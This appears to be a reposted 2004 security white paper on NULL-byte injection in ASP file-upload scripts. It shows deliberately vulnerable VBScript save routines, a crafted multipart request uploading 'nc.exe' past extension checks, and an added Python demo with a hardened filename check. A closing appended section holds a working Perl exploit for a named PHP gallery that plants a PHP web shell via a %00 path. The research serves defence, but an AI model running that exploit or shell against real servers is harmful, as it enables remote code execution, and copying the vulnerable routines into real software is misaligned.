0x00 vs ASP file upload scripts

Original post, 21 July 2004 21:34:00

Copyright Security-Assessment.com Ltd 2004
White Paper
Title: 0x00 vs ASP file upload scripts
Prepared by: Brett Moore
Network Intrusion Specialist
Security-Assessment.com
Date: 13 July 2004
Abstract
The effects of the `Poison NULL byte` have not been widely explored in ASP, but
as in other languages the NULL byte can cause problems when ASP passes data to
external objects.
Many upload systems written in ASP share a common flaw: a NULL byte can be
inserted into the filename parameter, and any extension that follows the NULL
byte is ignored when the file is written.
In some cases this makes it possible to bypass checks for valid extensions,
even when the extension is appended by the application itself.
The attack is very similar to those against Perl and PHP; the difference lies
in how the NULL byte is delivered to the application.
The problem arises when data is compared and validated in ASP script but then
passed to the FileSystemObject without being checked for NULL bytes.
This document discusses how ASP upload scripts can be affected by the Poison
NULL byte attack.
Scope
The information in this document is based on research done using upload
systems that accept multipart/form-data posts and use the
Scripting.FileSystemObject object.
Throughout this document we focus on the CreateTextFile method, which is used
to create a file for writing, but it is possible that other object methods are
vulnerable to the same type of problem.
A %00 or NULL cannot be delivered through the URL or an ordinary
(application/x-www-form-urlencoded) form post: the web server treats it as the
end of the string and does not store it in the filename variable.
When a filename is sent in a multipart/form-data post, however, the NULL byte
is included in the filename variable and so reaches the calls to the
FileSystemObject.
File Uploading
File uploading is commonly done using an input element of type file and an
encoding type of multipart/form-data. The HTML 4.01 forms specification (see
References) describes the encoding as follows:
The content type "application/x-www-form-urlencoded" is inefficient for sending
large quantities of binary data or text containing non-ASCII characters. The
content type "multipart/form-data" should be used for submitting forms that
contain files, non-ASCII data, and binary data.
A "multipart/form-data" message contains a series of parts, each representing a
successful control. The parts are sent to the processing agent in the same order
the corresponding controls appear in the document stream.

A form that produces such a post (the markup below is reconstructed from the
field names and target of the request shown under "Multipart Form Post"; the
paper's own form markup was lost):

<form action="/upload.asp" method="post" enctype="multipart/form-data">
Your Picture: <input type="file" name="YourFile">
<input type="submit" name="submit" value="Upload">
</form>

When submitted, the form data is sent in multipart/form-data format, which
allows every byte, including NULLs, to be transferred in the posted data.
On receipt, the target ASP page must parse and decode the posted data into a
usable state.

File Saving
At some point in the uploading process the file is saved to a location on disk.
The following is typical code for doing so.

Public Sub Save(filename)
    Dim objFSO, objFSOFile, path
    path = Server.MapPath("/uploads/")
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    ' filename comes straight from the multipart post; nothing here strips NULL bytes
    Set objFSOFile = objFSO.CreateTextFile(path & "/" & filename)
    objFSOFile.Write m_Blob    ' m_Blob holds the decoded file body
    objFSOFile.Close
End Sub

When the filename parameter is passed to CreateTextFile() it may contain NULL
bytes. This affects the name of the created file, because CreateTextFile reads
the name only up to the first NULL byte:

    Set objFSOFile = objFSO.CreateTextFile(path & "/" & filename)

If filename contains a NULL byte, anything after that byte is ignored.

Null Byte
The NULL byte can be inserted by editing the raw multipart post data with a hex
editor, or by modifying the request in an intercepting web proxy.
Multipart Form Post
POST /upload.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------7d4cb161b009c
Host: localhost
Content-Length: 359
Pragma: no-cache
Cookie: ASPSESSIONIDSAADRCRS=LAKNNAKAGMIBJCOOLBIFEHIK

-----------------------------7d4cb161b009c
Content-Disposition: form-data; name="YourFile"; filename="c:/nc.exe .bmp"
Content-Type: text/plain

Proof Of Upload Test File
brett.moore@security-assessment.com
-----------------------------7d4cb161b009c
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d4cb161b009c
The filename parameter of the above post has been changed as follows (the
space shown between .exe and .bmp is where the unprintable NULL byte sits):
N  C  .  E  X  E  (null) .  B  M  P
4E 43 2E 45 58 45   00   2E 42 4D 50
Note that an actual NULL byte (0x00), not the text "%00", has been inserted
between the .exe and the .bmp.


Script Tests
The two file save routines below are examples of upload scripts in which the
extension of the written file can be set arbitrarily.
In both cases tFile is the filename parameter taken from the post and m_Blob is
the decoded file body.


Example One ( File Extension Appending )

Public Sub Save(Path)
    Dim objFSO, objFSOFile
    Dim lngLoop
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    ' With tFile = "nc.exe" & Chr(0) & ".bmp" the built path ends in
    ' nc.exe<NUL>.bmp.bmp; CreateTextFile stops at the NUL and creates nc.exe
    Set objFSOFile = objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile & ".bmp"))
    ' Write the file contents
    For lngLoop = 1 To LenB(m_Blob)
        objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
    Next
    objFSOFile.Close
End Sub

Example Two ( File Extension Checking )

Public Sub Save(Path)
    Dim objFSO, objFSOFile
    Dim lngLoop
    ' Check the file extension: "nc.exe" & Chr(0) & ".bmp" really does end in
    ' .bmp, so the check passes; the NUL in the middle is never examined
    If Right(tFile, 4) <> ".bmp" Then Exit Sub
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    ' CreateTextFile again stops at the NUL and creates nc.exe
    Set objFSOFile = objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile))
    ' Write the file contents
    For lngLoop = 1 To LenB(m_Blob)
        objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
    Next
    objFSOFile.Close
End Sub
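The post from the Null Byte section replayed against the two routines above, as an added example in Python that is not part of the white paper: it builds the multipart body with a genuine 0x00 in the filename, parses it with a small parser that (like the upload components the paper tested) does nothing special with NULs, models the truncation the paper reports for CreateTextFile, and finishes with a hardened name check of the kind the Final Summary calls for. The upload directory, the extension allow-list, the file body and the Windows-style path joining are assumptions of the example.

```python
# Added example (not from the white paper). Boundary and field names follow the
# paper's capture; UPLOAD_DIR, SAFE_EXT and the file body are constructed here.
import re
from typing import Dict, List, Optional

BOUNDARY = b"---------------------------7d4cb161b009c"   # boundary from the paper's capture
UPLOAD_DIR = "C:\\inetpub\\uploads"                       # assumed Server.MapPath("/uploads/")
SAFE_EXT = {".bmp", ".gif", ".jpg", ".png"}               # assumed allow-list


def build_multipart(field: str, filename: bytes, body: bytes) -> bytes:
    """Build the two-part post from the paper. filename is bytes so an embedded
    NUL is sent as-is: multipart bodies are never URL-decoded."""
    delim = b"--" + BOUNDARY
    return (
        delim + b"\r\n"
        + b'Content-Disposition: form-data; name="' + field.encode("ascii")
        + b'"; filename="' + filename + b'"\r\n'
        + b"Content-Type: text/plain\r\n\r\n"
        + body + b"\r\n"
        + delim + b"\r\n"
        + b'Content-Disposition: form-data; name="submit"\r\n\r\n'
        + b"Upload\r\n"
        + delim + b"--\r\n"
    )


def parse_multipart(data: bytes) -> List[Dict]:
    """Minimal multipart parser with no NUL handling, like the ASP upload
    classes the paper tested. Returns one dict per part."""
    parts = []
    for chunk in data.split(b"--" + BOUNDARY):
        if chunk.startswith(b"--") or not chunk.strip():
            continue                      # closing delimiter or empty preamble
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        chunk = chunk[:-2] if chunk.endswith(b"\r\n") else chunk
        header, _, body = chunk.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', header)
        fname = re.search(rb'filename="([^"]*)"', header)
        parts.append({
            "name": name.group(1).decode("latin-1"),
            # the NUL survives decoding; it is an ordinary character to Python
            "filename": fname.group(1).decode("latin-1") if fname else None,
            "body": body,
        })
    return parts


def fso_name(path: str) -> str:
    """Models the behaviour the paper reports for CreateTextFile: the name is
    used only up to the first NUL byte."""
    return path.split("\x00", 1)[0]


def save_example_one(tfile: str) -> str:
    """Example One: the script appends .bmp and expects <tfile>.bmp on disk."""
    return fso_name(UPLOAD_DIR + "\\" + tfile + ".bmp")


def save_example_two(tfile: str) -> Optional[str]:
    """Example Two: Right(tFile, 4) <> ".bmp" rejects; otherwise written as-is."""
    if tfile[-4:] != ".bmp":
        return None
    return fso_name(UPLOAD_DIR + "\\" + tfile)


def safe_name(tfile: str) -> str:
    """Hardened replacement: reject NULs outright, keep only the base name, and
    allow-list the extension of the exact string that reaches the filesystem."""
    if "\x00" in tfile:
        raise ValueError("NULL byte in filename")
    base = tfile.replace("\\", "/").rsplit("/", 1)[-1]   # drop c:/ or ../ prefixes
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,5})", base)
    if m is None or m.group(1).lower() not in SAFE_EXT:
        raise ValueError("filename or extension not allowed: %r" % base)
    return base


def run_demo() -> Dict[str, Optional[str]]:
    """Replay the paper's post (constructed here) through both save routines."""
    post = build_multipart("YourFile", b"nc.exe\x00.bmp", b"Proof Of Upload Test File")
    tfile = parse_multipart(post)[0]["filename"]
    return {
        "tfile": tfile,                            # 'nc.exe\x00.bmp'
        "example_one": save_example_one(tfile),    # C:\inetpub\uploads\nc.exe
        "example_two": save_example_two(tfile),    # C:\inetpub\uploads\nc.exe
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-12s %r" % (key, value))
    try:
        safe_name("nc.exe\x00.bmp")
    except ValueError as err:
        print("hardened:    rejected (%s)" % err)
```

Both routines return the same path because the validation and the append operate on the whole string while the file is created from the prefix before the NUL; the hardened check works because it tests the very string it hands to the filesystem and refuses, rather than trims, anything that contains a NUL.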
Final Summary
It has commonly been thought that web applications written in ASP are safe from
the problems associated with NULL bytes. While in most instances this is true,
the examples here show that applications which make use of objects external to
the native ASP scripting engine, such as the FileSystemObject, can be affected
by NULL bytes.
It is probable that other objects and code paths can also be manipulated to
some extent when their data arrives through a multipart/form-data post.
As in other areas, proper validation of user input is paramount to the security
of web applications. Input should therefore be checked not only for the common
strings used in folder traversal but also for NULL bytes before it is used to
create a file, and a filename that fails either check should be rejected rather
than cleaned up.


References
Perl CGI problems, rain.forest.puppy, Phrack 55
http://www.phrack.org/show.php?p=55&a=7
Bugtraq post regarding PHP and NULL bytes
http://seclists.org/lists/bugtraq/2003/Jan/0159.html
OWASP Guide (HTML version)
http://www.cgisecurity.com/owasp/html/guide.html#id2846281
Forms in HTML documents (HTML 4.01 specification, section 17.13.4)
http://www.w3.org/TR/REC-html40/interact/forms.html#h-17.13.4
Security-Assessment.com
www.security-assessment.com

When a PHP program takes a user-specified PATH, appending %00 to the end of the PATH value makes it possible to upload an arbitrary file.

Test program: NEATPIC PHP directory direct-read edition 1.2.3

http://web.cncode.com/SoftView.asp?SoftID=1820

An exploit program (the escape sequences in the posted script had been mangled into forward slashes; they are restored here):
#!/usr/bin/perl
# Sends the NEATPIC upload request: the "path" field ends in %00 so the
# directory check stops there, and the "image" part carries a PHP shell.
use strict;
use warnings;
use Socket;

$| = 1;
my $host     = "127.0.0.1";
my $port     = 80;
my $boundary = "---------------------------7d41f4a600472";

# multipart body; "--$boundary" is the part delimiter
my $str =
    "--$boundary\r\n" .
    "Content-Disposition: form-data; name=\"path\"\r\n" .
    "\r\n" .
    "www.ppp%00\r\n" .
    "--$boundary\r\n" .
    "Content-Disposition: form-data; name=\"image\"; filename=\"F:\\tools\\1.gif\"\r\n" .
    "Content-Type: text/plain\r\n" .
    "\r\n" .
    "<?php\r\n" .
    "system(\$c);\r\n" .        # \$c so Perl does not interpolate the PHP variable
    "?>\r\n" .
    "--$boundary--\r\n" .
    "\r\n";

print $str;
my $len = length($str);
print "$len\n";

my $req =
    "POST /1/1/3721/index.php?action=upload HTTP/1.1\r\n" .
    "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n" .
    "Referer: http://127.0.0.1/index.php?path=.\r\n" .
    "Accept-Language: zh-cn\r\n" .
    "Content-Type: multipart/form-data; boundary=$boundary\r\n" .
    "Accept-Encoding: gzip, deflate\r\n" .
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n" .
    "Host: 127.0.0.1\r\n" .
    "Content-Length: $len\r\n" .
    "Connection: Keep-Alive\r\n" .
    "Cache-Control: no-cache\r\n" .
    "Cookie: PHPSESSID=111111111111111111111111\r\n" .
    "\r\n" .
    "$str\r\n\r\n";

print $req;
my @res = sendraw($req);
print @res;

# Hmm...Maybe you can send it by other way

# open a raw TCP connection, send the request and return the response lines
sub sendraw {
    my ($req) = @_;
    my $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, sockaddr_in($port, $target))) {
        select(S);
        $| = 1;
        print S $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}
